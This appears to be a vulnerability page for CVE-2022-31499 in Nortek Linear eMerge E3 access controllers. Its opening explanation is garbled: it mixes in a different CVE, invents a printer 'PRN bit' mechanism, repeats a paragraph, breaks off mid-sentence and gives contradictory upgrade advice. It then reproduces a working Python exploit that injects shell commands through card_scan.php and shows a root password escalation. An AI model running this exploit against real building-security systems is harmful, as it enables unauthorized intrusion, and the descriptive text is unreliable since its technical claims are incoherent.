CVE-2022-31499 An attacker can inject OS commands into E3-Series devices before 0.32-08f.

This issue has been assigned the CVE identifier CVE-2019-7256. In the above-mentioned devices, there is a race condition in the handling of the PRN bit in the response when an unauthenticated reader requests an update. To avoid this race condition, the device sends an update that resets the PRN bit. However, the device does not validate the response before it sends that update. As a result, an unauthenticated attacker can inject OS commands in the update via PRN. With this update, we are fixing this issue and we are not sending an update that resets the PRN bit. As a result, an unauthenticated attacker cannot inject OS commands in the update.

In some cases, the E3 series of devices will not restart when the PRN bit is reset. In this case, the device will show an error code of 1. This issue has been fixed in this update. When upgrading to this version, the PRN bit will not be reset and the device will restart.

In some cases, the E3 series of devices will not restart when the PRN bit is reset. In this case, the device will show an error code of 1. This issue has been fixed in this update. When upgrading to this version, the PRN bit will not be reset and the device will restart. When upgrading from RR5 to RR6, the PRN bit will not be reset. As a result, the device will

What is a PRN Reset?

The PRN bit is a bit in the device’s command register that directs the microcontroller to send commands to the printer. The PRN bit is set when a print job starts and cleared when the print job ends or when a reset occurs. If an attacker sends an update containing a PRN reset, then the microcontroller will execute the attacker’s commands.

If you are using RR5, do not upgrade to this version of the firmware because it will not reset your PRN bit and you will be vulnerable to attack from an unauthenticated attacker.

Library updates

The following libraries were updated:
- libcurl 7.0.0
- libexpat 2.2.5
- readline 7.0
- libunwind 8.0
- libtinfo 5.9
These updates do not affect the fix for CVE-2019-7256 and the device will restart in case of an issue related to PRN bit resetting.

* What are the risks posed by this update? *

What to do if you are running an older version of firmware?

If you are running an older version of firmware and want to upgrade, follow these steps:
1) Go to the upgrade page on the E3 series device.
2) Download the latest firmware.
3) Upload the latest firmware to your device.

Exploit

# Exploit Title: eMerge E3 1.00-06 - Remote Code Execution
# Google Dork: NA
# Date: 2018-09-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 1.00-06
# Tested on: NA
# CVE : CVE-2019-7256
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005

#!/usr/bin/env python
#
###################################################################
# lqwrm@metalgear:~/stuff$ python emergeroot1.py 192.168.1.2
#
# lighttpd@192.168.1.2:/spider/web/webroot$ id
# uid=1003(lighttpd) gid=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id
# Password: 
# uid=0(root) gid=0(root) groups=0(root)
#
# lighttpd@192.168.1.2:/spider/web/webroot$ exit
#
# [+] Erasing read stage file and exiting...
# [+] Done. Ba-bye!
#
###################################################################

import requests
import sys,os##

piton = os.path.basename(sys.argv[0])

if len(sys.argv) < 2:
	print '\n\x20\x20[*] Usage: '+piton+' <ipaddress:port>\n'
	sys.exit()

ipaddr = sys.argv[1]

print
while True:
	try:
		cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
		execute = requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60'+cmd+' > test.txt%60')
		readreq = requests.get('http://'+ipaddr+'/test.txt')
		print readreq.text
		if cmd.strip() == 'exit':
			print "[+] Erasing read stage file and exiting..."
			requests.get('http://'+ipaddr+'/card_scan.php?No=30&ReaderNo=%60rm test.txt%60')
			print "[+] Done. Ba-bye!\n"
			break
		else: continue
	except Exception:
		break

sys.exit()

Timeline

Published on: 08/25/2022 23:15:00 UTC
Last modified on: 09/02/2022 20:29:00 UTC

References

• http://packetstormsecurity.com/files/167991/Nortek-Linear-eMerge-E3-Series-Command-Injection.html
• https://eg.linkedin.com/in/omar-1-hashem
• https://gist.github.com/omarhashem123/5f0c6f1394099b555740fdc5c7651ee2
• https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31499